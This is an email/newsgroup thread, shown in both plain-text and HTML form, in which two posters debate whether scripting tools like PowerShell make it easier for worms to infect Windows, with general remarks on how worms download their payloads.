From: "Rich" 

This is a multi-part message in MIME format.

------=_NextPart_000_02AA_01C74F9A.0F5FC140
Content-Type: text/plain;
        charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

   I understand.  With your example you would be better using native =
code to call ftp, tftp, or whatever instead of native code to call =
PowerShell and then have it call ftp, tftp, or whatever.

Rich
  "Geo."  wrote in message
news:45d26a23{at}w3.nls.net...
  The way you get in with a worm typically is by executing some simple =
code=20
  that then downloads the worm executable, sort of like a bootstrap =
operation.=20
  Things like scripting make it easier to do that stage one and get the=20
  download going.

  Granted, not always required as an example sql server worm didn't need =
to=20
  use this technique, but most do. Certainly the latest NT worms =
including the=20
  ones that hit NT4 machines use this technique. They also use other =
handy=20
  stuff like ftp.exe or tftp.exe. The more capabilities the easier it is =
to=20
  infect a system.

  That's why the old macs were considered so secure, there just wasn't =
much to=20
  work with. It's also why if linux gets much more popular the virus =
problem=20
  there will be far worse than anything we've seen on windows.

  Geo.

  "Rich"  wrote in message news:45d1e42e$1{at}w3.nls.net...
     That's what I meant by "bypass the user".  Makes no difference.

  Rich

    "Geo."  wrote in message =
news:45d19efa$2{at}w3.nls.net...
    think worms not trojans. no user required.

    Geo.

    "Rich"  wrote in message news:45d131f1$1{at}w3.nls.net...
       Why?  If you can fool or bypass the user to run a program you may =
as=20
  well
    run a native program.

    Rich


------=_NextPart_000_02AA_01C74F9A.0F5FC140
Content-Type: text/html;
        charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable








   I
understand.  With =
your example=20
you would be better using native code to call ftp, tftp, or whatever = instead of=20
native code to call PowerShell and then have it call ftp, tftp, or=20
whatever.
 
Rich

  "Geo." <georger{at}nls.net>">mailto:georger{at}nls.net">georger{at}nls.net>
wrote=20
  in message news:45d26a23{at}w3.nls.net...Th=
e way=20
  you get in with a worm typically is by executing some simple code =
that=20
  then downloads the worm executable, sort of like a bootstrap =
operation.=20
  Things like scripting make it easier to do that stage one and get =
the=20
  download going.Granted, not always required
as an example =
sql=20
  server worm didn't need to use this technique, but most do. =
Certainly the=20
  latest NT worms including the ones that hit NT4 machines use this=20
  technique. They also use other handy stuff like ftp.exe;">ftp://ftp.exe">ftp.exe; or tftp.exe. The
more capabilities =
the easier=20
  it is to infect a system.That's why the old
macs were =
considered=20
  so secure, there just wasn't much to work with. It's also why if =
linux=20
  gets much more popular the virus problem there will be far worse =
than=20
  anything we've seen on
windows.Geo."Rich"
<{at}> =
wrote in=20
  message news:45d1e42e$1{at}w3.nls.net...=
  =20
  That's what I meant by "bypass the user".  Makes no=20
  difference.Rich 
"Geo." <georger{at}nls.net>">mailto:georger{at}nls.net">georger{at}nls.net>
wrote in =
message news:45d19efa$2{at}w3.nls.net...=
 =20
  think worms not trojans. no user required.  =
Geo. =20
  "Rich" <{at}> wrote in message news:45d131f1$1{at}w3.nls.net...=
    =20
  Why?  If you can fool or bypass the user to run a program you may =
as=20
  well  run a native
program. =20
Rich

------=_NextPart_000_02AA_01C74F9A.0F5FC140--

--- BBBS/NT v4.01 Flag-5